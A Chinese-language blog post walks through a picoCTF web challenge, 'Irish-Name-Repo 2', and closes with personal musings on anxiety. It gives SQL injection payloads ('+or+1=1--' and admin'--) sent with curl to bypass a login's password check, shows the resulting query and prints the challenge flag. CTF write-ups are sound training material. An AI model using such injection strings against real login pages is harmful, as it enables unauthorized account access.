[Day 27] Web 小迷茫 今天要解的題目和昨天有關聯 是他進階的2.0 沒錯,又是愛爾蘭人 ### Irish-Name-Repo 2 ( 350 points) There is a website running at https://jupiter.challenges.picoctf.org/problem/64649/ (link). Someone has bypassed the login before, and now it's being strengthened. Try to see if you can still login! or http://jupiter.challenges.picoctf.org:64649 **Hints** The password is being filtered. 昨天有關於 SQli 今天也繼續往這方面聯想 link 點入後提供了一個登入頁面 ``` <form action="login.php" method="POST"> <fieldset> <div class="form-group"> <label for="username">Username:</label> <input type="text" id="username" name="username" class="form-control"> </div> <div class="form-group"> <label for="password">Password:</label> <div class="controls"> <input type="password" id="password" name="password" class="form-control"> </div> </div> <input type="hidden" name="debug" value="0"> <div class="form-actions"> <input type="submit" value="Login" class="btn btn-primary"> </div> </fieldset> </form> ``` Oh NO 使用昨天的方式沒效 ``` root@kali:/media/sf_CTFs/pico/Irish-Name-Repo_2# curl "https://2019shell1.picoctf.com/problem/64649/login.php" --data "username=admin&password='+or+1=1--" && echo <h1>SQLi detected.</h1> ``` admin'or'1'='1 -- SQli detected 試試看調整 debug 參數 來檢查 SQli ~~改改看把0改成1~~ ``` root@kali:/media/sf_CTFs/pico/Irish-Name-Repo_2# curl <pre>username: admin'-- password: 1 SQL query: SELECT * FROM users WHERE name='admin'--' AND password='1' </pre><h1>Logged in!</h1><p>Your flag is: picoCTF{m0R3_SQL_plz_015815e2}</p> ``` 10/13 我的好朋朋提醒我,昨天這題 key point 沒抓對 不好意思各位,我想挑戰350分的題 解的有困難去看 write up 語意上有些誤會 真對不起大家 **這題必須要用 admin 的身分進去， 但是我沒有 admin 的密碼， 所以要把 SQL 查詢密碼的地方註解掉， 帳號輸入admin' -- 就會拿到 flag** 我昨天的錯誤在於強調 debug mode 0改成1 這段code昨天沒刪除 他是不需要的扣刪掉 就噴flag ㄌ "https://2019shell1.picoctf.com/problem/64649/login.php" --data "username=admin'--&password=1&debug=1" && echo **是錯的喔!!!** 為什麼我會想debug改成1試試呢? debug 改成 1 會出現 debug 的模式， 可以讓你 debug 知道你傳的帳號密碼會進去資料庫的時候 SQL 查詢語句長怎麼樣 ### picoCTF{m0R3_SQL_plz_015815e2} 附上我參考的 write up https://0xdiablos.github.io/Irish-Name-Repo/ 今天莫名的很迷茫焦躁 情緒在全身流竄 明白快樂是生命中一閃而逝的煙火 你們也為了那點光而努力生活嗎? 否則怎會有那句話 人生不如意十之八九 或許每個人都有陰影吧 如何面對自己的惡夢及缺陷 我也還學不會 我逃避了好多年 希望今年的我夠勇敢 足以面對